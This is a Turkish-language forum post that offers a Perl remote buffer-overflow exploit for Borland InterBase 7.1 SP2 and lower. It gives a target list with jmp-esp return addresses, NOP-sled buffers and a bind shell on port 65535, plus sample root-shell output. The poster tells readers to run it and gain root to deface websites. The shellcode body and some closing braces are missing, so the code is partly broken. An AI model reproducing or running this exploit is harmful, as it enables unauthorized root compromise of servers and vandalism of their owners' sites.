Borland Interbase 7.X Remote Exploit (NEW)

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    MoLiVeR's avatar
    Kayıt Tarihi: 25/Nisan/2003

    şimdi delphi kullananlar interbase bilirler adamlar oturmuş bunu exploitini yazmış

    ama size bu çok boş gelebelir şimdlik ..

    ilk bi shell edinin yada linuxnuz varsa verceğim kodu çalıtştırcaz

    aşağıdaki kodu ilk

    1- pico deyin içine kopyalayın

    2- perl dersen exploit çalışır

    3- perl -h localhost -t 0

    şimdi localhost demiş kaynak kodunda adam kendi linunda denemiş ve sheeline düşmüş demekki çalışıyo ispatlamış yani

    -t 0 felam yazıyo target demek oluyo orada target listen interbasein versionuu seçin ve sayıyı girin sonra okeyleyin

    ve böle bişeyler olucak -- burda -t 0 demiş gördünğünüz gibi ve localhostta shelle düşmüş ve yetkiniz 0 yani root siteleri emebilirsiniz artık

     [+] Using target 0: Linux Interbase 7.1 SP 2
    # [+] Sending first buffer... d0ne!
    # [+] Waiting... Got awnser!
    # [+] Sending final hit... Done!
    # [+] Enjoy your stay on this server =)
    # ****** Welcome to 'localhost' ******
    # Linux localhost 2.4.21-0.27mdk #1 Wed Jan 7 03:44:18 MST 2004 i686 unknown
    # unknown GNU/Linux
    # uid=0(root) gid=0(root) groups=0(root)

    kaynak kodu

    # Priv8security com remote exploit for Borland Interbase 7.1 SP 2 and lower
    # Public Version!!!
    # Bug found by Aviram Jenik unixfocus 5AP0P0UCUO.html
    # [wsxz@localhost buffer]$ perl -h localhost -t 0
    # -=[ InterBase Server 7.1 SP2 and lower remote exploit ]=-
    # [+] Using target 0: Linux Interbase 7.1 SP 2
    # [+] Sending first buffer... d0ne!
    # [+] Waiting... Got awnser!
    # [+] Sending final hit... Done!
    # [+] Enjoy your stay on this server =)
    # ****** Welcome to 'localhost' ******
    # Linux localhost 2.4.21-0.27mdk #1 Wed Jan 7 03:44:18 MST 2004 i686 unknown
    # unknown GNU/Linux
    # uid=0(root) gid=0(root) groups=0(root)
    use IO::Socket;
    use Getopt::Std; getopts('h:p:t:o:', \%args);

    if (defined($args{'h'})) { $host = $args{'h'}; }
    if (defined($args{'p'})) { $port = $args{'p'}; }else{$port = 3050;}
    if (defined($args{'t'})) { $target = $args{'t'}; }else{$target = 0;}
    if (defined($args{'o'})) { $offset = $args{'o'}; }else{$offset = 0;}

    print "\n-=[ InterBase Server 7.1 SP2 and lower remote exploit ]=-\n\n";
    print "Usage:
    -h <host>
    -p Port <default 3050>
    -t Target number from list.\n\n";
    print STDERR "Targets:
    0 - Linux Interbase 7.1 SP 2
    1 - Linux Interbase 6.01 InterBaseSS_LI-V6.0-1.i386.rpm
    2 - Crash\n\n";
    print STDERR "Usage: perl $0 -h Victim -t target\n\n";

    $shellcode = # portbind 65535 by Ramon de Carvalho

    if ( $target == "0" ) { # TESTED
    $ret = 0x081b7ee3; # jmp esp
    $pack = 0;
    $desc = "Linux Interbase 7.1 SP 2";
    if ( $target == "1" ) { # TESTED
    $ret = 0x080c77bd; # jmp esp
    $pack = 1;
    $desc = "Linux Interbase 6.01 .rpm";
    if ( $target == "2" ) {
    $ret = 0x41424344;
    $pack = 1;
    $desc = "Crash it!";

    $new_ret = pack('l', ($ret));

    # Request buffer
    $buffer = "\x00\x00\x00\x01\x00\x00\x00\x13\x00\x00\x00\x02\x00\x00".
    "A" x 334 .

    # This buffer is for 7.1 version, its a simple classic overflow.
    $buffer2 = "\x00\x00\x00\x13\x00\x00\x00\x00\x00\x00\x01\x2c".
    "A" x 152 . $new_ret . "\x90" x (144 - length($shellcode)) . $shellcode.

    # This buffer is for 6.01, a little tricky to exploit.
    $buffer3 = "\x00\x00\x00\x13\x00\x00\x00\x00\x00\x00\x01\x4e".
    "\x90" x (128 - length($shellcode)) . $shellcode.
    $new_ret x 2 . "\xf8\xfd\xff\xbf" . "\x90" x (180 - length($shellcode)) . $shellcode.

    $sock = IO::Socket::INET->new(Proto=>"tcp", PeerHost=>$host,PeerPort=>$port)
    or die "[-] Cant Connect!!\n";

    print STDERR "[+] Using target $target: $desc\n";
    print STDERR "[+] Sending first buffer...";
    print STDERR " d0ne!\n";
    print STDERR "[+] Waiting... ";
    print STDERR "Got awnser!\n";
    print STDERR "[+] Sending final hit... ";
    print STDERR "Done!\n";

    $sc = IO::Socket::INET->new(Proto=>"tcp", PeerHost=>$host,PeerPort=>65535,Type=>SOCK_STREAM,Reuse=>1)
    or die "[-] No luck, try other offset next time ok.\n";

    print "[+] Enjoy your stay on this server =)\n";


    print $sc "echo;echo \"****** Welcome to '`hostname -s`' ******\"\n";
    print $sc "echo;uname -a;id;echo\n";

    die "cant fork: $!" unless defined($pid = fork());

    if ($pid) {
    while(defined ($line = <$sc>)) {
    print STDOUT $line;
    kill("TERM", $pid);
    while(defined ($line = <STDIN>)) {
    print $sc $line;
    print "Good bye!!\n";

    Ir4DeX Security Group 2007
Toplam Hit: 2306 Toplam Mesaj: 1